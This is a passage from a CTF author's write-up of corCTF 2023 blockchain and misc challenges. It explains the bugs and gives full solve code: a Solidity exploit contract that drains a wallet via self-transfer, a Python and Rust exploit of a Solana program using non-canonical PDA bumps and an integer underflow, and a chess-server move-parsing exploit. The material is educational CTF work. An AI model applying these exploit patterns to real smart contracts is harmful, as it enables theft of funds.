    function transferFrom(address from, address to, uint256 amt) public {
        uint256 allowedAmt = allowances[from][msg.sender];
        uint256 fromBalance = balances[from];
        uint256 toBalance = balances[to];

        require(fromBalance >= amt, "You can't transfer that much");
        require(allowedAmt >= amt, "You don't have approval for that amount");

        balances[from] = fromBalance - amt;
        balances[to] = toBalance + amt;
        allowances[from][msg.sender] = allowedAmt - amt;
    }

    fallback() external payable {}
    receive() external payable {}
}

The Setup contract just deploys your instance, funds the BabyWallet contract with 100 ether, and defines the win condition - drain the BabyWallet contract to 0 ether.

This was the first Solidity smart contract I'd ever written, so the bug was very simple: a transferFrom call with from == to would double your balance. Run it through in your head if you don't see why.
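If you'd rather not run it through in your head, here's a quick Python model of the transferFrom accounting (a sketch of the logic, not real Solidity):

```python
# Python model of the buggy transferFrom accounting with from == to:
# both balance reads happen before either write, so the second write
# clobbers the first.
balances = {"me": 100}
allowances = {("me", "me"): 100}

def transfer_from(frm, to, amt, sender):
    allowed = allowances[(frm, sender)]
    from_balance = balances[frm]      # reads 100
    to_balance = balances[to]         # also reads 100 when frm == to
    assert from_balance >= amt and allowed >= amt
    balances[frm] = from_balance - amt   # me: 100 - 100 = 0
    balances[to] = to_balance + amt      # me: 100 + 100 = 200 (overwrites!)
    allowances[(frm, sender)] = allowed - amt

transfer_from("me", "me", 100, "me")
print(balances["me"])  # 200
```

The cached reads are the problem: with two distinct addresses the math works out, but when both reads alias the same entry, only the last write survives.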

This requires that allowances[from][msg.sender] is greater than or equal to your amount, so you have to call approve on yourself first. Here's my exploit contract:

pragma solidity ^0.8.17;

import "../contracts/BabyWallet.sol";
import "../contracts/Setup.sol";

contract Exploit {
    constructor(address target) payable {
        Setup setup = Setup(target);
        BabyWallet wallet = BabyWallet(setup.wallet());
        wallet.deposit{value: 100 ether}();
        wallet.approve(address(this), 100 ether);
        wallet.transferFrom(address(this), address(this), 100 ether);
        wallet.withdraw(200 ether);
    }
}

We first deposit 100 ether, then approve ourselves to transfer 100 ether. Next, we use the transferFrom bug to double our recorded balance to 200 ether. Finally, we withdraw all 200 ether (the 100 starting ether, and the 100 we deposited). This completely drains the contract, fulfilling the win condition.

corctf{inf1nite_m0ney_glitch!!!}

tribunal

tribunal was the second blockchain challenge, and the harder of the two. It was a Solana smart contract, and it actually built off of the solidarity challenge from last year's corCTF, fixing all of the major bugs.

Connecting to the challenge, we see this:

Just like last year, it's a sort of bootleg governance setup. You can vote to donate lamports to a proposal. The admin can withdraw the funds from the vault PDA at any time.

There are three bugs in the contract:

  1. use of non-canonical bumps
  2. underflow in vote()
  3. config.total_balance is not decremented after withdraw (this one I left in by accident)

I'll explain the bugs as best I can (but I am a blockchain noob so this might be slightly inaccurate).

To understand the first bug you need to first understand PDAs. Program Derived Addresses (PDAs) in Solana are accounts on the blockchain with no private key, often used to store variables or as a hashmap. They allow smart contracts to sign for accounts, but since they have no private key, no other user can generate signatures for that account.

PDAs are not created by the contract directly; instead, they are found from a list of seeds (a list of byte strings) and their parent program ID. The program ID and seeds are run through a hash function (SHA-256), and the result is checked to see if it forms a public key lying on the Ed25519 elliptic curve. If it lies on the curve, that's a problem, since PDAs are not supposed to have a private key.

To stop PDAs from having a private key, they need to be bumped off of the Ed25519 curve. To do this, a bump seed (a number) is added to the seeds to modify the hash input and hopefully bump the result off of the curve. To find a PDA address, you start with a bump seed of 255 and decrement until a bump is found where the output does not lie on the curve. There's around a 50% chance that any given hash results in a valid public key, so with 256 chances (255 down to 0), the chance that no PDA is found is negligible.

The first bump that results in a valid PDA (one that does not lie on the curve) is called the canonical bump. However, the issue is that there are other valid bumps that can also result in a valid PDA that aren't the canonical bump.
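The derivation loop can be sketched in Python (a conceptual model only: is_on_curve here is a stand-in for the real Ed25519 point-decompression check, and the actual hash input differs from this simplification):

```python
# Conceptual sketch of Solana's PDA derivation and the canonical bump search.
import hashlib

def create_program_address(seeds, program_id, is_on_curve):
    data = b"".join(seeds) + program_id + b"ProgramDerivedAddress"
    addr = hashlib.sha256(data).digest()
    if is_on_curve(addr):
        # a PDA must NOT be a valid curve point (no private key may exist)
        raise ValueError("invalid seeds: address lies on the curve")
    return addr

def find_program_address(seeds, program_id, is_on_curve):
    # canonical bump: start at 255 and decrement until we fall off the curve
    for bump in range(255, -1, -1):
        try:
            addr = create_program_address(seeds + [bytes([bump])], program_id, is_on_curve)
            return addr, bump
        except ValueError:
            continue
    raise ValueError("no viable bump found")
```

The key takeaway: find_program_address always returns the *first* (highest) working bump, but create_program_address happily accepts any bump that happens to work.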

To see why this is an issue, let's look at initialize() in the contract.

#[repr(C)]
#[derive(BorshSerialize, BorshDeserialize)]
pub struct Config {
    pub discriminator: Types,
    pub admin: Pubkey,
    pub total_balance: u64,
}

// ...

// initialize config, should only run once
fn initialize(
    program: &Pubkey,
    accounts: &[AccountInfo],
    config_bump: u8,
    vault_bump: u8,
) -> ProgramResult {
    let account_iter = &mut accounts.iter();
    let user = next_account_info(account_iter)?;
    let config = next_account_info(account_iter)?;
    let vault = next_account_info(account_iter)?;

    // ensure that the user signed this
    if !user.is_signer {
        return Err(ProgramError::MissingRequiredSignature);
    }

    // get config and vault
    let Ok(config_addr) = Pubkey::create_program_address(&[b"CONFIG", &[config_bump]], &program) else {
        return Err(ProgramError::InvalidSeeds);
    };
    let Ok(vault_addr) = Pubkey::create_program_address(&[b"VAULT", &[vault_bump]], &program) else {
        return Err(ProgramError::InvalidSeeds);
    };

    // assert that the config passed in is at the right address
    if *config.key != config_addr {
        return Err(ProgramError::InvalidAccountData);
    }

    // ensure that the config passed in is empty (we only want to initialize once)
    if !config.data_is_empty() {
        return Err(ProgramError::AccountAlreadyInitialized);
    }

    // create config
    invoke_signed(
        &system_instruction::create_account(
            &user.key,
            &config_addr,
            Rent::minimum_balance(&Rent::default(), CONFIG_SIZE),
            CONFIG_SIZE as u64,
            &program,
        ),
        &[user.clone(), config.clone()],
        &[&[b"CONFIG", &[config_bump]]],
    )?;

    // ...
}

The initialize() function initializes the smart contract by creating a config and vault, and it should only be run once. The config holds important variables like the admin (owner of the contract), and the total balance. Since we only want initialize to run once, we check the location of the config, and ensure that there is no data already there.

But, look at how we get the config address!

let Ok(config_addr) = Pubkey::create_program_address(&[b"CONFIG", &[config_bump]], &program) else {
    return Err(ProgramError::InvalidSeeds);
};

config_bump comes from the user! If we were using Pubkey::find_program_address, it wouldn't take a custom bump; it would use the canonical bump by starting at 255 and decrementing. But since we can pass in a custom bump, we can find another valid non-canonical bump and create a second config PDA at that address.

This lets us create a new config where we are the admin of the smart contract, meaning we can now pass the admin check in withdraw().

Now, our goal is to drain the vault, but the total_balance check in withdraw() stops us from doing that with our new config:

fn withdraw(program: &Pubkey, accounts: &[AccountInfo], lamports: u64) -> ProgramResult {
    let account_iter = &mut accounts.iter();
    let user = next_account_info(account_iter)?;
    let config = next_account_info(account_iter)?;
    let vault = next_account_info(account_iter)?;

    // ensure that the user signed this
    if !user.is_signer {
        return Err(ProgramError::MissingRequiredSignature);
    }

    // positive amount
    if lamports <= 0 {
        return Err(ProgramError::InvalidArgument);
    }

    // require that the config is correct
    if config.owner != program {
        return Err(ProgramError::InvalidAccountData);
    }

    let config_data = &mut Config::deserialize(&mut &(*config.data).borrow_mut()[..])?;
    if config_data.discriminator != Types::Config {
        return Err(ProgramError::InvalidAccountData);
    }

    // check that the config has enough balance
    if config_data.total_balance < lamports {
        return Err(ProgramError::InsufficientFunds);
    }

    // ...
}

Since we just created a new config, its total_balance is 0. We need to find a bug that lets us increment total_balance to a really high number so we can drain the vault. If we look in the only place total_balance is changed, vote(), we see this code:

fn vote(
    program: &Pubkey,
    accounts: &[AccountInfo],
    proposal_id: u8,
    lamports: u64,
) -> ProgramResult {
    // ...

    // update the config total balance
    config_data.total_balance = config_data.total_balance.checked_add(lamports).unwrap() - 100; // keep some for rent
    config_data
        .serialize(&mut &mut (*config.data).borrow_mut()[..])
        .unwrap();
}

Our config's total_balance is incremented by the lamports we put in the vote, but 100 is subtracted for rent. Notice how we use checked_add correctly to add to total_balance, but then we just subtract 100!

Rust in release mode does not protect against integer underflows/overflows, which means that if we vote with less than 100 lamports, the u64 will underflow below 0, becoming a really high amount.
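The arithmetic can be modeled in Python, simulating Rust's release-mode wrapping u64 subtraction with mod 2**64:

```python
# Model of vote()'s balance update: checked_add, then an unchecked "- 100".
# In a release build, Rust wraps u64 arithmetic instead of panicking.
U64 = 2**64

def vote_balance_update(total_balance, lamports):
    total = total_balance + lamports
    if total >= U64:
        raise OverflowError("checked_add would panic here")
    return (total - 100) % U64  # the unchecked subtraction wraps

# voting 1 lamport with a fresh config (total_balance == 0) underflows:
print(vote_balance_update(0, 1))  # 18446744073709551517
```

One vote with a single lamport leaves total_balance just shy of 2^64, which is far more than the vault holds.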

From there, we can withdraw with our underflowed config, and the original vault (when we run initialize() we also make another vault, but we don't want to use this one because it has no lamports).

I also left another bug in by accident: withdraw() doesn't decrement total_balance. You could use this to repeatedly vote() to increment total_balance and withdraw() to get your money back, pumping up total_balance on your config until you could withdraw enough to win that way. Oops.

Here are my solve scripts:

import os
os.system('cargo build-bpf')

from pwn import args, remote
from solders.pubkey import Pubkey
from solders.keypair import Keypair
import solders
import base58
import binascii
import struct

host = args.HOST or 'be.ax'
port = args.PORT or 30555

program_keypair = Keypair()

r = remote(host, port)

solve = open('target/deploy/solve.so', 'rb').read()

print(r.recvuntil(b'program pubkey: ').decode())
r.sendline(str(program_keypair.pubkey()).encode())
print(r.recvuntil(b'program len: ').decode())
r.sendline(str(len(solve)).encode())
r.send(solve)

# get public keys
print(r.recvuntil(b'program: ').decode())
program = Pubkey(base58.b58decode(r.recvline().strip()))
print(r.recvuntil(b'user: ').decode())
user = Pubkey(base58.b58decode(r.recvline().strip()))

print(f"program: {program}")
print(f"user: {user}")

config, config_bump = None, None  # Pubkey.find_program_address([b'CONFIG'], program)
vault, vault_bump = None, None  # Pubkey.find_program_address([b'VAULT'], program)

for i in range(255):
    try:
        config, config_bump = Pubkey.create_program_address([b'CONFIG', bytes([i])], program), i
        break
    except:
        continue

for i in range(255):
    try:
        vault, vault_bump = Pubkey.create_program_address([b'VAULT', bytes([i])], program), i
        break
    except:
        continue

print(f"{config_bump=} {vault_bump=}")

real_vault, _ = Pubkey.find_program_address([b'VAULT'], program)
p4_addr, _ = Pubkey.find_program_address([b'PROPOSAL', b'\x04'], program)

print(r.recvuntil(b'num accounts: ').decode())
r.sendline(b'7')
r.sendline(b'zzzz ' + str(program).encode())
r.sendline(b'ws ' + str(user).encode())
r.sendline(b'w ' + str(config).encode())
r.sendline(b'w ' + str(vault).encode())
r.sendline(b'w ' + str(real_vault).encode())
r.sendline(b'w ' + str(p4_addr).encode())
r.sendline(b'zzzz ' + str(solders.system_program.ID).encode())
print(r.recvuntil(b'ix len: ').decode())
r.sendline(b'2')
r.sendline(bytes([config_bump, vault_bump]))
r.interactive()
use borsh::BorshSerialize;
use solana_program::{
    account_info::{next_account_info, AccountInfo},
    entrypoint::ProgramResult,
    instruction::{AccountMeta, Instruction},
    program::invoke,
    pubkey::Pubkey,
    system_program,
};

#[derive(borsh::BorshSerialize)]
pub enum TribunalInstruction {
    Initialize { config_bump: u8, vault_bump: u8 },
    Propose { proposal_id: u8, proposal_bump: u8 },
    Vote { proposal_id: u8, amount: u64 },
    Withdraw { amount: u64 },
}

pub fn process_instruction(_program: &Pubkey, accounts: &[AccountInfo], data: &[u8]) -> ProgramResult {
    let account_iter = &mut accounts.iter();
    let tribunal = next_account_info(account_iter)?;
    let user = next_account_info(account_iter)?;
    let config = next_account_info(account_iter)?;
    let vault = next_account_info(account_iter)?;
    let real_vault = next_account_info(account_iter)?;
    let p4_addr = next_account_info(account_iter)?;

    let config_bump = data[0];
    let vault_bump = data[1];

    // use non-canonical config and vault bumps to initialize a config
    invoke(
        &Instruction {
            program_id: *tribunal.key,
            accounts: vec![
                AccountMeta::new(*user.key, true),
                AccountMeta::new(*config.key, false),
                AccountMeta::new(*vault.key, false),
                AccountMeta::new_readonly(system_program::id(), false),
            ],
            data: TribunalInstruction::Initialize {
                config_bump,
                vault_bump,
            }.try_to_vec().unwrap(),
        },
        &[user.clone(), config.clone(), vault.clone()],
    )?;

    // vote for a proposal with <100 lamports to underflow total balance
    invoke(
        &Instruction {
            program_id: *tribunal.key,
            accounts: vec![
                AccountMeta::new(*user.key, true),
                AccountMeta::new(*config.key, false),
                AccountMeta::new(*vault.key, false),
                AccountMeta::new(*p4_addr.key, false),
                AccountMeta::new_readonly(system_program::id(), false),
            ],
            data: TribunalInstruction::Vote { proposal_id: 4, amount: 1 }.try_to_vec().unwrap(),
        },
        &[user.clone(), config.clone(), vault.clone(), p4_addr.clone()],
    )?;

    // now, withdraw with that config
    invoke(
        &Instruction {
            program_id: *tribunal.key,
            accounts: vec![
                AccountMeta::new(*user.key, true),
                AccountMeta::new(*config.key, false),
                AccountMeta::new(*real_vault.key, false),
                AccountMeta::new_readonly(system_program::id(), false),
            ],
            data: TribunalInstruction::Withdraw {
                amount: 98_000_000_000,
            }.try_to_vec().unwrap(),
        },
        &[user.clone(), config.clone(), real_vault.clone()],
    )?;

    Ok(())
}

corctf{its_y0ur_time_to_f4ce_the_CoR_tribunal}

10 solves was more than I was expecting for this challenge, since IMO last year's Solana challenge was easier and got fewer solves. It seems like more talented teams registered this year, which is nice!

touch-grass

To solve the challenge, go outside and touch grass.

corctf{i_hope_you_d1dnt_have_a_gr4ss_allergy}

I guess I can also explain how the challenge worked behind-the-scenes, since no source was provided.

This challenge was implemented with a NodeJS + Express app (my bread and butter), that made some calls to GCP's Cloud Vision API to do some checks. There were a multitude of anticheat checks (that probably sniped a lot of innocent grass touchers) that were designed to prevent cheating and actually force you to go outside.

Here's a list of everything that happens in the back-end when you upload an image:

  1. Recaptcha is validated (this helps to reduce GCP costs)
  2. The server attempts to read EXIF data, image raw data, and metadata to check for ["imagedescription", "copyright", "paint"] and GIMP. If any are found, this anticheat is triggered.
  3. Cloud Vision's Web Detection is used to reverse image search for your image. If enough online samples are found, the reverse image search anticheat is triggered.
  4. Cloud Vision's Label Detection is then used to detect grass and your hand, stopping if either isn't found.
  5. Cloud Vision's Text Detection is then used to OCR your image to find the code (you are allowed at most one error in the code, and the OCR results are returned to the user).
  6. The final anticheat then runs - if the code is found, it checks the center of each digit and records the color. If there are too many duplicate colors (e.g. you wrote this in some photo editing software with a single brush color), this anticheat is triggered.
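For the curious, the final check can be sketched like this (a hypothetical reconstruction: the function name, threshold, and pixel-sampling API are my own inventions, not the actual challenge code):

```python
# Hypothetical sketch of the duplicate-color anticheat (step 6): sample the
# pixel at the center of each OCR'd digit and flag too many exact repeats.
def too_many_duplicate_colors(digit_centers, get_pixel, max_dupes=2):
    colors = [get_pixel(x, y) for (x, y) in digit_centers]
    dupes = len(colors) - len(set(colors))  # count exact color repeats
    return dupes > max_dupes

# a real photo of ink on paper has lighting noise, so exact repeats are rare;
# a digital brush stroke produces one identical color for every digit.
```

Handwritten digits photographed outdoors naturally vary pixel-to-pixel, which is why this check is good at catching single-color digital edits.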

Of course, lots of people probably got past all the anticheats. But I also think a lot of people were forced to touch grass, which means this challenge was a success :)

While I wrote the code for this challenge and did all the testing (I had to go outside so many times 😭), special thanks to 0x5a for giving the idea for the challenge and FizzBuzz101 for writing all the anticheat meme messages that got released in #hall-of-shame.

This was definitely a joke challenge but I'm glad that people seemed to like it. You can check out the code on our GitHub when it gets released.

msfrogofwar2

Another year, another chess challenge. This was the fourth chess challenge I helped write or contributed to, and all three corCTFs so far have had one.

The premise is simple, beat the chess AI for a flag. However, the chess AI is Stockfish, the most powerful chess engine out there. While you might be able to run Stockfish to a higher depth locally to outplay the server, you have to do it in 20 moves.

No matter how well you play, there's a 0% chance that you can beat Stockfish in 20 moves. So, there must be some way to exploit the server to beat it, and that was the core of the challenge. I hope you know how to play chess, since I'm not going to explain the rules in this writeup.

Most of the provided source is the implementation for a chess move generator. Yes, I wrote my own move generator for this challenge. Yes, it was a real pain in the ass.

Basically, all of the rules of chess are implemented in the provided code, so obviously there was some bug there that you can abuse to beat Stockfish. However, if you stare hard at all the logic for the move generation (I commented almost every line, so hopefully it isn't too bad), you might realize that there are only minor issues.

To convince yourself of this, you can perft my setup - this means counting all the strictly legal moves up to a certain depth and comparing the counts against published known values. When I did this on my own engine, I found no discrepancies; apparently there were some minor issues after all, but nothing broken enough to win with.

Well, if there's no abusable bug in the move generation, there must be a bug somewhere else in the code. The other part of the challenge is the wrapper code, connecting the game's state and the player input to the chess engine.

The main bug you needed to find was here, in move parsing:

def from_uci(game, uci):
    move = Move(Position.from_uci(uci[0:2]), Position.from_uci(uci[2:4]))
    piece = game.board.at(move.start)

    # if pawn promotion on last rank, set promotion flag
    if Piece.kind(piece) == Piece.PAWN \
        and len(uci) == 5:
        target_kind = Piece.kind(CHAR_TO_PIECE[uci[4]])
        move.promotion = move.end.rank == {Piece.WHITE: 7, Piece.BLACK: 0}[game.turn] and target_kind

    # ...

When parsing a move in UCI notation (like "e2e4"), if the piece is a pawn and the length is five, it tries to parse it as a promotion. In UCI notation, promotions look like "e7e8q", as in, pawn on square e7 moves to e8 and promotes to a queen. It gets the "kind" of the piece (queen in the above example). Then, it sets move.promotion to move.end.rank == {Piece.WHITE: 7, Piece.BLACK: 0}[game.turn] and target_kind.

Essentially, if the pawn is moving to the final rank, it sets move.promotion to target_kind. If the pawn isn't moving to the final rank, move.promotion is False. That seems fine. But actually, there's a terrible issue here: null pieces in my library are denoted as None, not False.

class Piece:
    NONE = None
    KING = 0
    PAWN = 1
    KNIGHT = 2
    BISHOP = 3
    ROOK = 4
    QUEEN = 5
    KIND_MASK = 7

    WHITE = 8
    BLACK = 16
    COLOR_MASK = 24

    # ...
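You can work the "e2e4k" parse through in plain Python with the constants above (e4 is rank index 3, so the last-rank comparison fails and the and short-circuits):

```python
# The promotion assignment for "e2e4k" as white, worked through by hand.
KING, WHITE = 0, 8

end_rank = 3                          # e4; the final rank for white is 7
promotion = (end_rank == 7) and KING  # short-circuits to False, never KING
assert promotion is not None          # so a `!= Piece.NONE` check won't catch it
print(promotion | WHITE)              # 8, i.e. Piece.KING | Piece.WHITE
```

False is distinct from None, but as an integer it is 0, and 0 happens to be Piece.KING.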

Since we set move.promotion to False, it gets used here:

def play_move(self, move, turn):
    piece = self.at(move.start)
    start_index = move.start.to_index()
    end_index = move.end.to_index()

    self.squares[end_index] = piece
    self.squares[start_index] = Piece.NONE

    if move.castle != None:
        # play rook move stored in castle field
        self.play_move(move.castle, turn)

    if move.en_passant != None:
        # capture pawn stored in en_passant field
        self.squares[move.en_passant.to_index()] = Piece.NONE

    if move.promotion != Piece.NONE:
        # change piece to be the one stored in the promotion field
        self.squares[end_index] = move.promotion | turn

Essentially, if we do an invalid promotion, we promote to False, which as a number is 0, which as a piece is a king. So we can promote a pawn to a king at any time. How is that useful? Well, let's look at this helper function:

def king_in_danger(game, danger_squares):
    # loop through board to look for king
    for index, piece in enumerate(game.board.squares):
        if piece == Piece.KING | game.turn:
            king_pos = Position.from_index(index)
            if king_pos not in danger_squares:
                return False

    # else, king is in danger
    return True

This looks fine at first glance, but it actually makes the hidden assumption that there is only one king. If there are multiple kings, and any one of them is not in danger, the function returns False!

And this function is used to determine if you're going into checkmate, or where the king can move. So, if you promote multiple pawns to kings, you can basically clean up the entire board and not worry about losing.
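A stripped-down model of king_in_danger makes the flaw obvious (a sketch over a flat 64-square list with my own example indices, not the real classes):

```python
# Two friendly kings: the real one is attacked, the promoted one is safe.
KING, WHITE = 0, 8

def king_in_danger(squares, turn, danger_indices):
    for index, piece in enumerate(squares):
        if piece == KING | turn:
            if index not in danger_indices:
                return False  # found *a* safe king, so "not in danger"
    return True

board = [None] * 64
board[4] = KING | WHITE    # the real king, on an attacked square
board[28] = KING | WHITE   # a pawn "promoted" to king, on a safe square
print(king_in_danger(board, WHITE, {4}))  # False
```

With only one king on the board the function behaves correctly; a second king makes the check trivially pass forever, so check and checkmate stop mattering.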

Okay, so when sending a UCI string with an invalid promotion, the move will have a pawn promote to king. But how does this move get validated? When you play a move, it checks that the move is legal, which this certainly is not:

def play_move(self, move):
    if self.game.turn != chesslib.Piece.WHITE:
        return
    if self.game.turns >= TURN_LIMIT:
        return

    move = movegen.Move.from_uci(self.game, move)
    legal_moves = self.game.get_moves()
    if move not in legal_moves:
        return

    # ...

Well, let's check how moves are compared:

class Move:
    # ...

    def __eq__(a, b):
        return a and b and a.start == b.start and a.end == b.end

Ah, so when moves are compared, only their positions are checked! That means that when the line move not in legal_moves is run, if our illegal pawn promotion is move, then as long as a legal move exists with the same start and end position, the server will think the move is legal!
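To see it concretely, here's a minimal sketch with the same __eq__ logic (using plain strings for positions instead of the real Position class):

```python
# The legality check passes because equality ignores the promotion field.
class Move:
    def __init__(self, start, end, promotion=None):
        self.start, self.end, self.promotion = start, end, promotion

    def __eq__(a, b):
        # only start/end squares are compared; promotion is never checked
        return bool(a and b and a.start == b.start and a.end == b.end)

legal_moves = [Move("e2", "e4")]          # the normal double pawn push
ours = Move("e2", "e4", promotion=False)  # the bogus "e2e4k" promotion
print(ours in legal_moves)  # True
```

The in operator calls __eq__ pairwise, so our poisoned move matches the legitimate e2e4 and sails through validation.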

The bug is very sneaky. To use this bug, start a new game and then in the JavaScript console you can send the command:

socket.emit("move", "e2e4k")

This moves the pawn on e2 to e4, promoting it to a king. With this bug, it's possible to beat Stockfish in less than 20 moves.

corctf{If you know the enemy and know yourself, you need not fear the croaks of a hundred frogs - Sun Tzu}

This challenge was inspired by this CVE, which I thought was funny. Special thanks to Quintec on the team for helping me test the challenge!


Thanks for reading! I hope you enjoyed the CTF!

Anyway, those are all the writeups for my challenges. Writing challenges is always a lot of fun, and I hope to see you again next year for corCTF 2024!

Feel free to DM me on Discord @ strellic if you have any questions.

Also, follow me on Twitter.

Also, if you're going to DEF CON Finals this year in-person and meet up, send me a DM!

Also, check out SekaiCTF 2023! I'm writing some more web challenges for that CTF so I hope to see you there!
